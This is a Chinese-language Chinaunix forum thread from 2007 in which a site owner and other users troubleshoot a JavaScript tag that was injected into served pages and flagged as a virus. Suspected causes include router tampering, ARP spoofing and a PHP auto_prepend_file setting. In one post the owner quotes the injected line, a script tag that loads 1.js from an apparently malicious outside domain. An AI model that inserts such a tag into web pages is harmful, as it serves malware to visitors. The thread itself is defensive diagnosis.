我现在怀疑是电信的缘故,在传送过程中被加入这段代码,我的猜测会是正确的吗?
原帖由 showsa 于 2007-1-27 15:26 发表于 5楼
前短时间听说过消息
说有人在中间路由上投放病毒,不知真假
原帖由 hq22 于 2007-1-27 11:35 发表于 1楼
今天早上,突然发现浏览自己网站的某些网页,瑞星报出病毒,查看源文件一看,在<html>的最先面加了一段js代码,明显就是那段代码在作怪,马上进入服务器看,可是那个网页好好的,并没有被修改,纳闷,于是 ...
原帖由 showsa 于 2007-1-27 15:26 发表于 5楼
前短时间听说过消息
说有人在中间路由上投放病毒,不知真假
原帖由 hq22 于 2007-1-28 09:22 发表于 9楼
我觉的是这个可能,不知道确切不确切?其他情况基本上可排除,网页文件是我自己写的,结构一清二楚,有的页面没有调用数据库,在浏览器上也有这段代码,另外服务器是自己的,就放了一个网站,没其他任何应用 ...
原帖由 HonestQiao 于 2007-1-28 13:24 发表于 11楼
楼主可以按照我的步骤测试一下子么?
步骤如下:
1. 你在你当前的电脑访问这个网页,是否出现类似的问题?
2. 如果1成立,则让其他地方的网友访问1的页面,是否出现问题?
3. 在服务器,通过wget来访 ...
原帖由 showsa 于 2007-1-27 15:26 发表于 5楼
前短时间听说过消息
说有人在中间路由上投放病毒,不知真假
原帖由 skylove 于 2007-1-29 12:22 发表于 16楼
楼主是租用的虚拟主机吗? 如果是的话。。。我大概知道问题出在哪了
原帖由 HonestQiao 于 2007-1-29 15:07 发表于 17楼
ext_filter可以做到这个。
原帖由 artou 于 2007-1-29 11:22 发表于 15楼
和我前一阶段遇到的问题差不多
1、你把apache换个端口看看那段js代码还在不在?
2、用同一个网段的其它服务器访问这个网页看看?
3、服务器彻底检查一下。
如果是在路由上被修改,那是没有解决办法的。。 ...
原帖由 飘雪心辰 于 2007-1-29 15:44 发表于 20楼
============================
你的php不是配置成自动附加某一文件的话 ,你的这段调用js的代码恳定是在你服务器上的。
楼主呀,我就算是代表我们这一些人,能不能把你的这张病毒网页地址发给偶们这帮人瞧瞧。 ...
原帖由 hq22 于 2007-1-29 16:01 发表于 22楼
现在想起来了,是这个地址
<script src=http://waigua9999.com/1.js></script>
申明:浏览前请确保自己的电脑不被感染病毒,由此造成的损失与我无关。
原帖由 hq22 于 2007-1-29 16:01 发表于 22楼
现在想起来了,是这个地址
<script src=http://waigua9999.com/1.js></script>
申明:浏览前请确保自己的电脑不被感染病毒,由此造成的损失与我无关。
原帖由 skylove 于 2007-1-29 18:17 发表于 24楼
您给的这个url的ip是来自 61.152.114.102 ,请核对是否与您的租用主机在同一主机上?或者同一段ip内??? 如果是的话,在server上动了手脚地可能性粉大;
如果不是,那么能否说说您的web构成:比如serv ...
; Automatically add files before or after any PHP document.
auto_prepend_file =
auto_append_file =
原帖由 xmbbx 于 2007-1-30 14:59 发表于 29楼
同网段中有别的电脑中病毒了,造成类似arp欺骗的情况,前段时间我们也出现这个问题,主机是托管的,让IDC去查,没多久就解决了.
今天有没有人碰到我一样的情况阿,我现在怀疑是电信的缘故,在传送过程中被加入这段代码,我的猜测会是正确的吗?如果是服务器的话,那麻烦就大了,说明被黑客黑了
欢迎光临 Chinaunix (http://bbs.chinaunix.net/) | Powered by Discuz! X3.2 |